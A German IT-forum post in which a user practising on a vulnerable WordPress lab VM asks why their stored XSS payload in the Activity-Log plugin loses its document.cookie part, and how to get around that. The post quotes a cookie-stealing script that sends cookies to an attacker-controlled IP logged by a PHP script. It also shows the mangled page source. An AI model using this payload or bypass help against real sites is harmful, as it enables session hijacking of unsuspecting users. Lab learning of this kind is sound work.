2
Javascript wird nicht komplett angezeigt
Hi Experten,
ich befasse mich gerade etwas mit XSS und habe dazu eine verwundbare Wordpress VM installiert. Dort ist das Plugin Activity-Log in einer verwundbaren Version installiert. Damit ist es möglich einen stored XSS Angriff durchzuführen.
Hier die Infos zum verwundbaren Plug-In inkl. PoC
https://www.exploit-db.com/exploits/40083/
Hier mal mein "AngriffsCode"
Auf meiner Angriffsmaschine lüft ein kleines PHP-Script, das mir das empfangene Cookie dann ordentlich in eine Datei schreibt. Führe ich das Javascript in der Browser console aus, dann klappt alles wunderbar.
Führe ich jedoch den eigentlichen Angriff aus, dann klappt leider nichts mehr. Deshalb habe ich mir dann mal den Seitenquelltext der Wordpress-Kiste angeschaut. Und mein JavaScript Teil sieht dann so aus:
irgendwie kommt also der document.cookie Teil abhanden. Hat jemand eine Idee warum, bzw. kann ich das umgehen?
Danke schon mal für eure Hilfe
ich befasse mich gerade etwas mit XSS und habe dazu eine verwundbare Wordpress VM installiert. Dort ist das Plugin Activity-Log in einer verwundbaren Version installiert. Damit ist es möglich einen stored XSS Angriff durchzuführen.
Hier die Infos zum verwundbaren Plug-In inkl. PoC
https://www.exploit-db.com/exploits/40083/
Hier mal mein "AngriffsCode"
<script>new Image().src='http://192.168.241.132/?c='+document.cookie;</script> Auf meiner Angriffsmaschine lüft ein kleines PHP-Script, das mir das empfangene Cookie dann ordentlich in eine Datei schreibt. Führe ich das Javascript in der Browser console aus, dann klappt alles wunderbar.
Führe ich jedoch den eigentlichen Angriff aus, dann klappt leider nichts mehr. Deshalb habe ich mir dann mal den Seitenquelltext der Wordpress-Kiste angeschaut. Und mein JavaScript Teil sieht dann so aus:
<script>new Image().src=\'http://192.168.241.132/?c=\'+</td><td class='type column-type'>User</td> ......... irgendwie kommt also der document.cookie Teil abhanden. Hat jemand eine Idee warum, bzw. kann ich das umgehen?
Danke schon mal für eure Hilfe
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 353360
Url: https://administrator.de/contentid/353360
Printed on: April 25, 2024 at 10:04 o'clock
2 Comments
Latest comment
Seit wann ist es denn verboten eine VM von Vulnhub zu bearbeiten?
